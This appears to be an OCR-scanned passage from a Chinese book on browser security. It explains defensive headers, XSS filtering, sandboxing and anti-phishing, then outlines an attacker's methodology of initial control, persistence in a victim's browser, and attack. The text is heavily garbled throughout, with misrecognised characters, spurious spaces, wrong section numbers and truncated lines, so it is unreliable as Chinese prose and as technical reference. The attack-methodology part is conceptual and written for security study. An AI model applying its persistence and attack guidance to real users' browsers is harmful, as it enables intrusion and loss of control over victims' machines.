浏览 器 可 以 使 用 各 种 检测 技术 判断 服务 器 返回 了 什么 类 型 的 内 容 。 然后 , 浏览 器 会 执行 一 些 
与 该 内 容 类 型 相关 的 操作 。 而 nosniff 指 令 可 以 禁用 浏览 右 的 上 述 行 为 ， 强 制 浏 览 器 按照 
Content-type Hib Ki AF. 

举 个 例子 ， 如 果 服 务 需 给 一 个 script 标 签 返回 的 响应 中 带 有 nosniff 指 令 ， 那 么 除非 响应 
的 MIME 类 型 是 application/javascript( 或 其 他 几 个 字符 串 ), 否则 浏览 锅 会 忽略 啊 应 内 容 。 
对 Wikipedia 之 类 ( 允许 上 传 ) 的 网 站 来 说 ， 能 做 到 这 一 点 非常 重要 。 

假如 响应 不 包含 这 个 指令 ， 而 且 有 人 上 传 了 一 个 特殊 的 文件 ， 后 来 该 文件 又 被 人 下 载 的 话 ， 
可 能 就 会 造成 威胁 。 此 时 ,浏览 器 可 能 就 会 按照 惯例 错误 地 解释 文件 的 MIME 类 型 ， 例 如 把 JPEG 
当 作 脚本 来 解释 。 从 浏览 器 安全 角度 来 看 ,很 可 能 有 人 会 利用 这 一 点 控制 浏览 器 。 比 如 ,这 个 人 
上 传 一 种 允许 上 传 的 文件 ( 看 起 来 似乎 很 安全 )， 而 浏览 器 随后 却 以 男 一 种 比较 危险 和 易 变 的 方 
式 去 解释 它 。 

5. Strict-Transport-Security 

这 个 HTTP 首 部 指示 浏览 器 必须 通过 有 效 的 HTTPS 通 道 与 网 站 通信 。 如 果 是 一 个 不 安全 的 连 
fe, 用 户 不 可 能 接受 HTTPS 错 误 并 继续 浏览 网 站 。 相 反 , 浏览 器 会 解释 错误 ， 并且 不 允许 用 户 继 
续 浏 览 。 
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6. X-Frame-Options 

X-Frame-Options HTTP 首 部 用 于 阻止 浏览 絮 中 的 页 面 内 骸 框 架 。 浏 览 右 在 看 到 这 个 首部 后 ， 
应 该 保证 不 把 接收 到 的 页 面 显示 在 一 个 IFrame 中 。 
制定 这 个 首部 的 目的 是 防止 发 生 有 界面 伪装 (UI redressing ) 攻击 ， 其 中 之 一 就 是 点 击 劫持 
(clickjacking )。 这 种 攻击 是 把 诱导 页 面 放 到 一 个 完全 透明 的 前 景 框架 窗口 中 ， 而 用 户 以 为 自己 点 
击 的 是 下 方 不 透明 的 〈 被 攻击 的 ) 页 面 ， 实 际 上 点 击 的 却 是 透明 的 前 景 (诱导 ) 页 面 。 

X-Frame-Options 首 部 可 以 防止 一 部 分 界面 伪装 攻击 ， 关 于 这 类 攻击 ， 第 4 章 将 详细 讨论 。 




















1.3.2 RJZ! XSS 过 滤 


这 个 浏览 器 安全 特性 试图 检测 、 清 除 和 阻止 第 2 章 将 会 介绍 的 反射 型 XSS (Reflected XSS )。 
浏览 器 会 尝试 被 动 地 发 现 已 经 成 功 的 反射 型 XSS 攻 击 ， 然 后 尝试 清除 响应 中 的 脚本 ， 更 多 的 时 候 
是 阻止 它们 执行 。 




















1.3.3 小 箱 


沙 箱 ( sandbox ) 是 一 个 解决 现实 问题 的 折 中 方案 。 基 本 前 提 是 浏览 需 会 遭受 威胁 ， 并 且 可 能 
被 攻击 者 控制 。 这 还 用 说 吗 ? ! 最 简单 也 最 实际 的 说 法 , 就 是 开发 者 不 可 避免 地 会 写 出 隐患 代码 来 。 

很 多 人 都 认为 ,软件 产品 中 不 可 避免 地 会 包含 隐患 代码 。 尽管 安 全 社区 的 人 会 为 此 对 开发 人 
员 说 三 道 四 ， 但 事实 如 此 ， 也 不 必 隐 讳 。 沙 箱 就 是 解决 这 个 普遍 性 问题 一 个 很 好 的 尝试 。 
显然 ， 开 发 人 员 多 大 程度 上 符合 这 个 假设 ( 即 写 出 隐患 代码 )， 取 决 于 很 多 复杂 的 因素 ， 其 
至 包括 睡眠 不 足 或 者 咖啡 豆 质量 不 过 关 。 沙 箱 本 质 上 不 过 是 缓 兵 之 计 , 它 把 浏览 器 的 高 危 区 域 封 
装 在 安全 围墙 之 下 ,把 注意 力 吸 引 到 较 小 的 攻击 面 上 。 对 浏览 器 安全 团队 而 言 , 这 种 风险 与 回报 
之 比 是 很 划算 的 。 

沙 箱 并 不 是 一 个 新 点 子 ， 其 他 软件 开发 领域 也 有 这 个 思想 。 比 如 ，Sun 公 司 对 可 信 Solaris 采 
取 区 域 划 分 措施 ， 而 FreeBSD 有 Jails。 对 资源 访问 的 限制 取决 于 进程 权限 。 

1. 浏览 器 沙 箱 

很 多 层面 都 可 以 使 用 沙 箱 机 制 。 比 如 ， 可 以 应 用 在 内 核 级 别 ， 把 不 同 用 户 隔 离开 ; 可 以 应 用 
在 硬件 级 别 ， 实 现 内 核 与 用 户 空间 的 权限 分 离 。 

浏览 器 沙 箱 属于 用 户 空 间 程序 中 最 高 层次 的 沙 箱 , 它 隔离 的 是 操作 系统 赋予 浏览 器 的 权限 和 
在 浏览 器 中 运行 的 子 进程 的 权限 。 

要 想 完 全 拿 下 浏览 器 ,至 少 要 两 步 。 第 一 步 是 找到 浏览 器 功能 上 的 漏洞 ,第 二 步 就 是 突破 沙 
箱 。 后 者 也 叫 绕 开 沙 箱 ( sandbox bypass )。 

在 有 的 浏览 器 中 , 沙 箱 策略 体现 在 用 不 同 的 进程 打开 不 同 的 网 站 , 让 恶意 网 站 很 难 影响 其 他 
网 站 乃至 操作 系统 。 这 种 沙 箱 同样 也 应 用 于 插件 和 扩展 ， 比 如 把 PDF 泻 染 进程 独立 出 来 。 

绕 开 沙 箱 能 够 得 偿 , 通常 是 因为 编译 后 的 代码 种 类 庞杂 ， 而 且 攻 击 者 企图 破坏 整个 进程 。 这 
种 情况 下 沙 箱 有 效 性 的 标志 就 是 它 能 否 通 过 检验 , 即 能 否 阻止 被 破坏 的 执行 路 径 取 得 全 部 进程 的 









































































































































































































































权限 。 

2. IFrame 沙 箱 

作为 一 种 机 制 ， 可 以 使 用 IFrame 显 示 来 自 不 同 来 源 不 被 信任 的 内 容 ， 有 了 时候 也 可 以 用 于 显示 
来 自 相同 来 源 但 不 被 信任 的 内 容 。 比 如 ，Facebook 的 社交 媒体 部 件 ” 就 是 一 个 例子 。 利 用 IFrame 
于 坏事 并 不 新 鲜 , 浏览 器 厂商 很 长 时 间 以 来 一 直人 致力 于 设置 各 种 防范 措施 ,降低 这 个 家 伙 对 浏览 
需 造 成 的 威胁 。 

HTML5 规 范 也 提出 了 一 个 IFrame 沙 箱 建 议 ， 而 且 已 经 被 现代 浏览 器 支持 。 开 发 者 对 它 只 有 
最 低 限 度 的 权限 。 沙 箱 下 rame 指 的 是 给 这 个 般 入 的 帧 添加 一 个 HTML5 属 性 。 

添加 这 个 属性 后 ， 就 不 能 在 其 中 使 用 表单 、 执 行 脚 本 ,也 不 能 导航 到 顶层 页 面 , 而 且 只 能 限 
于 与 一 个 来 源 通信 。 施 加 于 每 一 个 父 框架 的 限制 ， 都 会 被 符 在 其 中 的 子 框架 自动 继承 。 


13.4 反 网 络 钓 鱼 和 反 恶 意 软件 


通过 伪造 在 线 内 容 ( 包括 电子 邮件 ) 穷 取 证 书 等 个 人 信息 的 行为 ， 一 般 称 为 网 络 钓 鱼 
(phishing )。 很 多 组 织 都 会 公布 钓鱼 网 站 的 信息 ， 而 现代 浏览 器 可 以 利用 这 些 信 息 。 

浏览 器 会 在 访问 网 站 时 , 将 其 与 恶意 站 点 名 单 进 行 对 照 。 如 果 检 测 到 要 访问 的 网 站 是 一 个 钓 
鱼网 站 ， 浏 览 器 就 会 采取 措施 。 相 关内 容 将 在 第 2 章 介绍 。 

类 伏地， 服务 器 也 可 能 在 所 有 者 未 察觉 的 情况 下 被 利用 ,或 者 有 人 专门 运行 这 种 服务 器 , FE 
管 着 一 些 利 用 浏览 需 的 隐患 内 容 。 这 些 网 站 会 诱惑 用 户 手工 下 载 和 执行 软件 ,从 而 绕 过 浏览 器 防 
御 措施 。 

关于 托管 有 恶意 代码 的 恶意 网 站 , 有 很 多 组 织 都 提供 了 相应 的 黑 名 单 。 浏 览 器 可 以 直接 引用 ， 
以 便 实时 检测 。 






































































































































1.8.5 混入 内 容 


AIBA AA (mixed content ) 网 站 ， 是 指 某 个 来 源 使 用 HTTPS 协 议 ， 然 后 又 通过 HTTP 请 
求 内 容 。 换 名 话说 ， 所 有 页 面 内 容 都 不 是 通过 HTTPS 发 送 的 。 

不 通过 HTTPS 传 输 的 内 容 有 可 能 被 修改 , 使 得 任何 加 密 数据 的 措施 形同虚设 。 如 果 通 过 未 加 
密 的 通道 传输 的 是 脚本 , 那么 攻击 者 就 可 能 在 数据 流 中 注入 指令 , 进而 破坏 浏览 器 与 服务 器 间 的 


交互 。 


1.4 核心 安全 问题 


浏览 器 安全 特性 的 一 度 扩 张 , 芮 定 了 如 今 既 广阔 又 复杂 的 局 面 。 传 统 网 络 安全 一 般 依赖 外 于 
或 边界 防御 设施 的 部 署 与 维护 ， 比 如 防火 墙 。 随 着 时 间 推 移 , 这些 设备 似乎 要 把 除了 基本 流量 之 
外 的 一 切 都 过 滤 掉 。 

对 网 络 的 管控 虽然 越 来 越 严密 ， 但 访问 信息 的 需求 一 点 没有 减少 ， 投 入 实际 使 用 的 Web 技 术 
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( 相当 多 流量 走 的 都 是 80 或 443 端 口 ) 也 越 来 越 多 。 实际 上 , 防火 墙 非常 有 效 地 起 到 了 限 流 的 作用 ， 
而 只 给 我 们 剩 下 了 HTTP 流 量 。 日 益 增多 的 SSL VPN 技 术 取 代 过 去 的 IPSEC VPN 的 应 用 就 是 一 个 
很 好 的 例子 。 

当然 ， 防 火 墙 所 做 的 就 是 把 所 有 网 络 流量 都 归 总 到 两 个 端口 上 : 80 和 443。 这 样 的 流量 迁移 
极 大 依赖 于 浏览 器 的 安全 模型 。 

接 下 来 我 们 讨论 一 下 浏览 器 安全 的 基本 情况 , 以 及 攻防 之 中 的 有 利和 不 利 因素 构成 的 复杂 局 
面 。 特别 地 ， 我 们 会 专注 于 为 什么 Web 流 量 没有 被 限制 住 ， 反 而 为 各 种 攻击 提供 了 可 能 性 。 


1.4.1 Baw 


攻击 面 (attack surface ) 不 是 个 新 概念 ， 它 指 的 是 浏览 器 容易 遭受 未 信任 来 源 攻击 影响 的 范 
Hs]. 这样 说 来 , 最 小 的 情况 下 , 浏览 需 的 泻 染 引擎 就 是 问题 所 在 。 浏 览 器 的 攻击 面 是 越 来 越 大 了 ， 
毕竟 大 量 的 API 和 各 种 存 取 数 据 的 抽象 功能 也 在 与 日 俱 增 。 

相反 , 网 络 的 攻击 面 很 大 程度 上 已 经 受到 了 严密 控制 。 接 和 人 点 和 受 控 流 量 的 概念 已 经 深入 人 
心 ， 而 改变 控制 流程 ， 结 果 就 会 不 一 样 。 比 如 ， 访 问 防火 墙 不 同 端口 流量 可 以 通过 人 们 熟悉 的 方 
法 得 到 轻易 验证 和 限制 。 

很 少 听 说 浏览 器 三 商会 删 减 浏 览 器 功能 的 , 倒是 经 常会 听 到 宣传 说 某 某 浏览 需 又 增加 了 什么 
功能 之 类 的 。 与 多 数 产 品 一 样 ， 削 弱 功 能 的 同时 还 要 维护 向 后 兼容 并 没有 什么 可 以 预见 的 好 处 。 
而 随 着 功能 不 断 增 多 ， 攻 击 面 势必 也 越 来 越 大 。 

现代 浏览 器 的 更 新 都 采用 后 台 自 动 和 静默 方式 有 时 候 , 攻击 面 的 变化 是 防御 者 意识 不 到 的 。 
某 些 情况 下 ,这 是 一 个 好 现象 。 可 是 ， 对 一 个 成 熟 和 可 靠 的 安全 团队 而 言 ， 这 样 往往 会 造成 更 多 
麻烦 ， 而 不 是 带 来 更 多 好 人 处 。 

然而 , 也 很 少 有 哪个 组 织 ， 其 安全 团队 成 员 敢 说 自己 在 浏览 器 防御 方面 非常 有 经 验 。 即 使 这 
个 软件 是 最 值得 信任 的 软件 之 一 ， 它 也 仍然 对 互联 网 暴露 着 自己 最 大 的 攻击 面 。 

1. 升级 速度 

浏览 器 安全 团队 不 一 定 会 与 组 织 的 步调 一 致 。 更 常见 的 情况 是 , 希望 维持 自己 安全 形象 的 厂 
商 却 无 力 修复 浏览 器 的 问题 。 

修复 浏览 器 的 安全 bug 常 常 被 开发 者 排 在 最 低 优 先 级 ， 这 与 安全 社区 的 期 望 恰 恰 相 反 。2013 

年 1 月 ， 随 着 Firefox 18.0 的 发 布 ，Mozilla 吹 咕 "* 自 己 修复 了 一 个 混入 内 容 的 问题 ， 也 就 是 说 ,使 
浏览 器 在 来 源 使 用 HTTPS 协 议 时 , 不 能 加 载 HTTP 内 容 。 如 果 我 告诉 你 Firefox 的 这 个 bug 早 在 2000 
年 12 月 就 被 人 发 现 了 5 , 你 会 作 何 感想 ? 也许 这 是 一 个 极端 的 例子 , 但 浏览 器 安全 bug 被 漠视 的 情 
况 由 此 可 见 一 斑 。 
从 终端 用 户 对 浏览 器 安全 升级 没有 发 言 权 这 一 点 来 说 ， 浏 览 需 与 其 他 软件 也 没有 什么 差别 。 
可 是 , 任何 组 织 也 不 可 能 因为 浏览 器 有 安全 问题 ,就 宣传 停止 所 有 浏览 如 的 使 用 ,就 地 等 修一 个 
重要 的 安全 补丁 发 布 ,这 么 说 来 ,从 浏览 器 安全 bug 被 爆 出 之 日 起 到 这 个 bug 被 修复 的 这 段 时 间 内 ， 
大 多 数组 织 的 浏览 器 都 处 于 容易 被 攻击 的 状态 。 





















































































































































































































































2. 静默 更 新 

静默 的 后 台 更 新 , 虽然 会 增 大 受 攻击 的 可 能 性 , 但 应 该 说 也 能 给 用 户 带 来 很 大 的 价值 。 为 保 
证 可 用 更 新 的 快速 应 用 ， 一 些 开 发 人 员 也 开始 实现 自己 的 静默 机 制 。 

比如 ， 谷 歌 就 给 自己 的 Chrome 浏 览 器 实现 了 一 个 静默 更 新 功能 “。 用 户 无 权 禁 用 这 个 功能 ， 
以 此 保证 及 时 提供 所 有 更 新 ， 而 不 会 被 用 户 阻 断 。 

这 方面 一 个 明显 的 例子 ， 就 是 谷歌 在 Chrome 中 部 署 自己 的 PDF 泻 染 引 擎 取代 Adobe Reader. 
这 确保 了 每 个 自动 更 新 的 Chrome 都 不 再 受制 于 这 个 第 三 方 插件 的 更 新 进程 。 

这 里 面 的确 有 问题 。 如 果 浏 览 絮 在 后 台 更 新 和 新 增 功 能 时 出 现 问 题 , 就 可 能 增 大 每 个 浏览 
的 攻击 面 。 这 样 所 有 组 织 的 安全 团队 都 不 得 不 在 某 种 程度 上 依赖 浏览 器 的 开发 者 , 而 在 浏览 器 开 
发 者 对 终端 用 户 组 织 的 需求 还 不 够 关注 的 情况 下 ， 这 种 依赖 着 实 令 人 愧 恼 。 

3. 扩展 

扩展 可 以 增强 浏览 器 功能 , 而 又 不 需要 单独 开发 一 款 软 件 。 但 扩展 可 以 影响 浏览 器 加 载 的 每 
一 个 页 面 ， 反 过 来 ， 每 个 页 面 又 会 影响 扩展 。 

每 个 扩展 都 可 能 成 为 攻击 者 的 目标 ， 因 而 它们 会 增 大 浏览 器 的 攻击 面 。 有 时候， 常见 的 XSS 
隐患 也 会 通过 扩展 进入 浏览 器 。 关 于 扩展 及 其 隐患 ， 将 在 第 7 章 讨 论 。 

4. 插件 

一 般 来 说 ,插件 就 是 能 够 独立 于 浏览 器 运行 的 软件 。 与 扩展 不 同 ,浏览 器 只 会 在 Web 应 用 通 
过 对 象 标签 或 Content-type 首 部 包含 它们 的 情况 下 ， 才 会 运行 插件 。 

有 些 互 联网 功能 离 不 开 合 适 的 插件 ,这 也 是 浏览 器 支持 增强 插件 功能 的 原因 。 比 如 ,浏览 融 
在 访问 Juniper 等 YPN 网 关 时 ， 就 要 使 用 Java 小 程序 。 

很 多 公司 的 业务 都 依赖 于 一 批 主流 的 浏览 器 插件 , 而 有 些 插 件 以 往 就 暴露 出 了 一 些 隐患。 在 
这 种 情况 下 ， 防 御 者 要 么 选择 使 用 包含 隐患 的 插件 ， 要 么 选择 停办 一 些 公司 业务 。 

大 部 分 插件 都 没有 集中 更 新 的 机 制 。 这 意味 着 在 某 些 情况 下 必须 手工 确保 它们 的 使 用 安全 ， 
从 而 给 防御 带 来 了 不 可 避免 的 负担 和 复杂 性 。 

很 多 安全 媒体 都 对 插件 给 予 负面 的 评价 。 由 于 一 些 固有 的 隐患 , 安全 专家 甚至 建议 组 织 清除 
所 有 这 些 插件 。 操 作 系 统 厂商 也 在 采取 措施 , 通过 自己 的 自动 更 新 机 制 禁 用 不 安全 的 插件 ， 禁 
时 间 为 不 确定 ， 或 者 至 安全 警报 解除 为 止 。 
插件 会 大 幅度 增加 攻击 面 。 它 们 既 能 增强 浏览 嚣 功 能， 又 为 黑客 提供 了 攻击 目标 。 第 8 章 将 
深入 探讨 插件 。 
1.4.2 ”放弃 控制 

浏览 器 从 互联 网 上 的 任意 地 点 请 求 指令 , 其 主要 功能 是 把 内 容 呈 现 于 屏幕 之 上 , 为 用 户 与 内 
容 交互 提供 界面 ， 而 且 会 严格 按照 作者 设计 的 方式 呈现 。 作 为 这 个 核心 功能 的 实施 结果 , 浏览 
必须 将 很 大 一 部 分 控制 权 让 渡 给 服务 器 。 浏览 右 必须 执行 收 到 的 命令 , 否则 就 有 可 能 无 法 正确 泻 
染 页 面 。 对 现代 的 Web 应 用 而 言 ， 页 面 中 包含 大 量 其 他 来 源 的 脚本 和 资源 是 很 正常 的 。 如 果 要 正 
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常 显示 页 面 ， 这 些 资源 也 必须 正确 处 理 和 运行 。 

以 前 ， 浏 览 器 接收 到 的 指令 很 简单 ， 类 似 于 “把 文本 放 在 这 儿 ， 把 图 片 放 在 这 儿 ”。 而 现代 
Web 应 用 和 浏览 器 可 能 会 发 出 类 似 这 样 的 请 求 :“ 我 要 打开 你 的 麦克 风 ， 然 后 异步 把 数据 发 送 给 
ABL ES CAS Ato” 

这 种 带 有 攻击 性 的 功能 随时 会 引发 一 个 问题 : 是 否 能 保证 所 有 用 户 只 浏览 非 恶 意 网 站 。 答案 
是 : 几乎 在 任何 情况 下 都 不 可 能 ! 浏览 带 不 安全 以 及 容易 受 攻击 , 正 是 因为 无 法 实时 保证 来 自 远 
程 服务 器 的 内 容 神圣 不 可 侵犯 。 














1.4.8 TCP 协议 控制 


服务 器 一 客户 端 模型 并 没有 提供 太 多 灵活 性 ， 比 如 使 用 哪个 端口 与 客户 端 通信 ， 客 户 端 可 以 
使 用 哪个 IP 地 址 交换 数据 。 

这 对 攻击 者 来 说 是 非常 有 用 的 ， 因 为 对 他 们 而 言 ， 几 乎 可 以 不 受 限制 地 攻击 HTTP 协 议 或 特 
定 系 统 。 再 加 上 其 他 相关 因素 ， 就 可 能 构成 不 同 的 攻击 。 第 10 章 将 讨论 协议 内 攻击 。 

















1.4.4 加 密 通 信 


为 了 保证 加 密 信息 的 完整 性 和 机 密 性 ， 可 以 使 用 SSL 和 TLS 与 受信 任 的 组 织 通信 ， 而 同样 的 
技术 也 可 以 用 于 与 攻击 者 进行 安全 的 通信 。 

浏览 器 与 服务 器 间 加 密 通 信 的 目标 , 是 保护 通信 双方 传输 的 数据 安全 。 这 就 给 防御 者 带 来 了 
问题 ， 因 为 他 们 没有 机 会 检查 到 恶意 数据 。 浏 览 器 支持 的 加 密 通信 可 以 为 攻击 者 所 用 ,让 他 们 私 
藏 恶意 指令 ， 并 且 安 全 地 转移 战利品 。 


1.4.5 同 源 策略 


SOP 在 不 同 浏览 器 技术 中 具有 不 一 致 的 应 用 方式 ， 恐怕 是 最 令 人 迷惑 的 一 个 概念 了 。 如 前 所 
述 ，SOP 的 用 意 是 在 浏览 器 中 隔离 资源 ， 以 防 同 一 浏览 器 中 来 自 不 同 来 源 之 间 的 资源 纠缠 不 清 。 
本 质 上 说 ， 这 也 是 一 个 沙 箱 。 

这 个 特殊 的 沙 箱 是 浏览 器 安全 的 重要 保障 机 制 。 考虑 到 在 网 络 活动 中 的 首要 地 位 , 浏览 器 实 
际 上 是 连接 互联 网 上 不 同 资源 区 域 的 事实 标准 , 因此 也 应 该 承担 着 维护 和 平 的 使 命 。 为 满足 每 个 
区 域 的 需求 ， 准 许 访问 不 同 来 源 的 自治 功能 相应 泛滥 。 如 果 这 些 功能 违背 SOP， 那 么 本 来 合法 的 
功能 就 可 能 成 为 敌人 ， 因 为 它们 会 穿越 安全 区 。 

理解 SOP， 不 能 仅仅 满足 于 它 在 浏览 器 中 的 实现 。SOP 的 实现 在 不 同 浏览 器 、 不 同 浏览 器 版 
本 ， 以 及 它们 的 插件 中 ,往往 有 很 大 差别 。 第 4 章 将 深入 探讨 SOP 的 各 种 实现 方式 ， 以 及 绕 过 其 
限制 的 花样 繁多 的 方式 。 这 些 方式 得 益 于 Java、AdobeReader、Silverlight 及 各 种 浏览 器 实现 中 的 
不 同 手法 。 























































































































以 往 很 多 有 用 的 经 验 之 谈 在 当前 全 球 浏览 器 面临 威胁 的 大 背景 下 已 经 不 适用 了 。 下 面 这 
些 错误 的 说 法 很 容易 把 人 拖 和 泥潭。 遗憾 的 是 ， 其 中 不 少 说 法 至 今 还 在 很 多 善意 的 人 群 中 大 
行 其 道 。 

1. 健壮 性 法 则 廖 论 

所 谓 健 壮 性 法 则 '"， 也 叫 伯 斯 塔 尔 法 则 (Postel's Law), EE Exp, Bulk 
时 要 开放 ”。 这 人 句 话 在 安全 实践 中 站 不 住 脚 。 

浏览 器 对 自己 要 演 染 的 内 容 是 极其 开放 的 。 这 也 是 XSS 为 何 难 以 根除 的 原因 。 浏览 器 给 开发 
安全 过 滤器 和 编码 器 带 来 了 困难 ， 因 为 它 允 许 以 各 种 方式 执行 指令 。 

为 了 鼓励 开发 人 员 遵 循 安全 编码 规范 ， 健壮 性 法 则 应 该 修正 为 “发 送 时 要 保守 ， 接收 时 要 更 
加 保守 ?。 如 果 下 一 代 开 发 人 员 都 潜移默化 地 接受 这 个 观念 ， 那 黑客 的 好 日 子 就 要 到 头 了 ! 

2. 外 围 安全 防线 诸 论 

很 多 组 织 都 喜欢 把 自己 的 安全 领域 想象 成 一 个 城堡 外 加 护城河 ,他 们 会 想象 着 用 几 i 
御 外 部 攻击 , 保护 自己 的 重要 资产 。 这 种 假设 的 前 提 是 洋葱 皮 似 的 层 层 包围 的 防护 机 制 
的 ， 可 惜 这 个 前 提 并 不 成 立 ， 因 为 复杂 的 网 络 不 是 中 世纪 的 欧洲 ! 

这 种 防御 观 的 问题 在 于 , 它 假 设 攻击 者 会 由 外 而 内 一 层 一 层 攻破 防线 。 这 种 假设 背离 现实 的 
程度 之 大 ， 就 像 好 莱 坞 大 片 背离 真正 的 历史 一 样 。 

一 个 组 织 的 内 部 网 是 一 个 经 党 要 与 攻击 者 玩 打 地 鼠 游戏 的 地 方 。 现 实情 况 是 , Dae ET 
很 多 洞 洞 ， 就 像 直接 在 高 高 的 围墙 上 面 打 开 了 很 多 口子 。 

防护 围墙 因此 会 被 间接 攻破 ,难以 阻拦 浏览 器 带 到 围墙 内 的 敌人 。 防 御 资 源 应 该 投放 给 封装 
重要 资源 的 微 安全 防线 (Micro Security Perimeter )。 今 天 的 网 络 防御 必须 针对 设备 ， 无 论 敌 友 ， 
防 患 未 然 。 

现实 中 ， 安 全 资源 总 是 有 限 的 ， 而 正 是 这 些 有 限 的 资源 却 要 用 于 守护 最 有 价值 的 资产 。 


1.5 浏览 器 攻防 方法 


本 章 到 此 ， 布 望 读者 已 经 了 解 了 浏览 锅 所 面临 挑战 的 复杂 性 。 保 证 Web 安 全 不 容易 ， 其 中 很 
多 精力 都 要 花 在 浏览 需 上 面 。 浏 览 需 是 一 道 重要 的 阻击 线 。 

在 一 个 假想 的 末日 后 的 高 科技 世界 里 ,每 一 个 站 点 都 失陷 成 为 恶意 站 点 ， 而 理想 的 浏览 器 在 
这 种 情况 下 应 该 依然 能 保证 你 的 计算 机 安全 。 而 要 达到 这 个 安全 乌托邦 ， 我 们 仍然 任重道远 。 

接 下 来 该 解释 一 下 浏览 器 攻防 的 含义 了 。 我 们 可 以 把 这 个 过 程 分 解 为 几 个 阶段 , 而 不 只 满足 
于 消除 现 有 弱点 或 者 苟 延 残 螨 。 为 此 , 我 们 找到 了 一 套 方法 , 希望 能 够 保证 现 有 地 带 的 持久 安全 。 

下 面 我 们 就 介绍 这 个 方法 ， 以 及 相关 手段 适用 的 情形 ， 如 图 1-1 所 示 ， 其 中 包含 一 个 攻防 流 
程 和 相应 的 路 径 。 
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图 1-1 本 书 的 攻防 方法 


这 套 方法 的 目标 是 涵盖 浏览 器 攻防 的 各 个 方面 , 而 本 书 也 完全 按照 这 套 方法 的 主要 阶段 组 织 
各 章 内 容 。 每 一 章 于 绕 一 个 阶段 深入 阐述 相关 的 技术 细节 。 一 章 一 章 地 往 后 看 ， 你 会 逐步 加 深 对 
这 套 方法 的 理解 。 

对 某 些 目标 而 言 , 这 套 方法 中 给 出 的 路 径 可 能 比较 简单 , 因为 有 很 多 免费 安全 工具 可 以 自动 
完成 相应 过 程 。 但 另外 一 些 情况 下 ， 可 能 就 要 具体 问题 具体 分 析 了 。 

浏览 器 攻防 方法 由 三 部 分 构成 ， 在 图 1-1 中 用 三 个 大 的 虚线 框 表示 。 这 样 从 最 高 层面 来 说 ， 
整个 攻击 过 程 就 分 三 个 阶段 ， 首 先是 初始 化 ， 然 后 是 持久 化 ， 最 后 是 攻击 。 
第 一 个 阶段 是 初始 化 ,是 整个 过 程 的 第 一 步 。 然 后 是 持久 化 ,考验 你 对 浏览 器 的 理解 。 这 一 







































































步 要 在 目标 浏览 器 或 浏览 器 所 在 设备 上 筑 起 防御 工事 ， 也 是 浏览 器 陷落 的 初始 阶段 。 

真正 的 挑战 来 自 于 下 一 阶段 。 攻 击 阶段 包含 七 大 攻击 方法 ,下 面 会 简单 介绍 , 余下 几 章 会 分 
别 详细 介绍 。 在 介绍 不 同 的 方法 时 ,我 们 会 展示 浏览 吉 不 同 的 侧面 和 可 以 利用 的 弱点 。 其 中 一 些 
攻击 技术 的 运用 可 能 会 在 其 他 浏览 器 中 表现 为 初始 化 阶段 , 从 而 导致 攻击 的 循环 , 以 及 受害 范围 
扩大 。 














1.5.1 初始 化 


初始 化 只 有 一 个 阶段 。 这 个 看 似 无 关 痛 痒 的 阶段 却 是 浏览 器 攻防 中 第 一 个 阶段 , 也 是 最 为 紧 
要 的 阶段 。 没 有 这 个 阶段 ， 任 何 攻 击 都 不 可 能 发 生 ， 目 标 浏 览 器 也 不 会 进入 攻击 者 的 视野 。 

初始 控制 

每 次 攻击 都 以 在 浏览 需 中 运行 指令 为 开端 。 为 此 , 浏览 器 必须 遇 到 (并 执行 ) 你 控制 的 指令 。 

这 是 第 2 章 的 主题 ， 里 面 会 讨论 一 些 方法 ， 给 浏览 器 布下 陷阱 ， 诱 使 、 坎 骗 或 者 强迫 浏览 
遇 到 你 的 指令 ， 然 后 更 重要 的 是 执行 任意 代码 。 


1.5.2 ”持久 化 


成 功 初 始 化 攻击 后 , 怎么 扩大 你 对 目标 的 控制 范围 ? 你 要 保持 对 浏览 器 的 控制 , 而 且 要 能 
发 动 进一步 攻击 。 

持久 化 控制 

听 说 过 一 个 精灵 和 三 个 愿望 的 故事 吗 ? 就 是 你 遇 到 一 个 精灵 , 它 会 答应 你 三 个 愿望 。 狐 点 的 
人 会 对 精灵 说 出 自己 的 愿望 ,而 且 最 后 一 个 愿望 是 希望 能 许 下 更 多 愿望 。 这 对 精灵 来 说 ,不 瘟 为 
一 个 压力 测试 啊 ! 
青 说 回 与 被 害 浏览 器 保持 通信 吧 。 你 的 初始 代码 要 让 浏览 咒 不 断 向 你 询问 下 一 个 愿望 。 你 在 
纠缠 阶段 放出 精灵 ， 控 制 住 浏览 器 让 它 不 断 答应 你 的 愿望 。 
就 像 精 灵 会 在 一 阵 烟 雾 中 消失 一 样 ， 这 种 状态 也 可 能 不 会 永远 维持 。 想 要 不 断 地 许愿 ， 还 得 
看 用 户 后 续 的 操作 。 用 户 可 能 会 一 下 子 关闭 发 动 攻击 的 标签 页 ， 或 者 又 用 它 打 开 了 另 一 个 网 站 。 
这 样 的 话 ，JavaScript 就 会 被 清除 ， 通 信 渠 道 也 就 关闭 了 。 

在 得 意 忘 形 地 想 要 发 动 下 一 次 攻击 之 前 , 明智 的 做 法 是 耐心 等 待 , 而 不 是 对 浏览 器 过 分 施加 
影响 。 这 个 阶段 , 你 要 尽量 降低 失去 浏览 器 控制 权 的 可 能 , 不 让 用 户 切 换 网 址 , 或 者 关闭 浏览 器 。 

实现 持续 控制 的 目标 也 分 儿 个 不 同 的 层面 。 最 重要 的 是 要 有 了 耐心 , 尽 可 能 完全 地 利用 这 个 阶 
段 ， 为 下 一 个 阶段 做 好 准备 。 这 是 因为 你 控制 浏览 器 的 时 候 越 长 ， 追 究 出 来 的 攻击 面 就 越 广 ,， 你 
的 攻击 就 越 具 有 可 控 性 。 

还 要 注意 的 是 ， 有 时 候 在 发 起 后 续 攻 击 期 间 , 成 功 的 攻击 会 揭示 出 巩固 阵地 的 方法 ,从 而 提 
升 控制 水 平 。 正 因为 如 此 ， 图 1-1 中 这 两 个 阶段 之 间 才 画 了 一 个 双向 箭头 。 经 验 会 告诉 你 什么 时 
候 应 该 巩固 控制 渠道 而 非 发 起 攻击 ， 什 么 时 候 发 起 攻击 有 助 于 控制 渠道 的 灵活 性 和 持久 性 。 
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15.3 Bot 


在 这 个 阶段 ， 就 要 利用 对 浏览 器 的 控制 ， 以 当前 情势 为 基础 ， 探 索 攻击 的 可 能 性 。 攻 击 形式 
有 很 多 ,包括 对 浏览 器 的 “本 地 ”攻击 ， 对 浏览 器 所 在 操作 系统 的 攻击 ， 以 及 对 任意 位 置 的 远程 
系统 的 攻击 。 

细心 的 读者 可 能 会 发 现 ， 在 这 一 阶段 的 方法 中 ， 绕 过 同 源 策略 处 于 首位 ， 而 且 高 高 在 上 。 
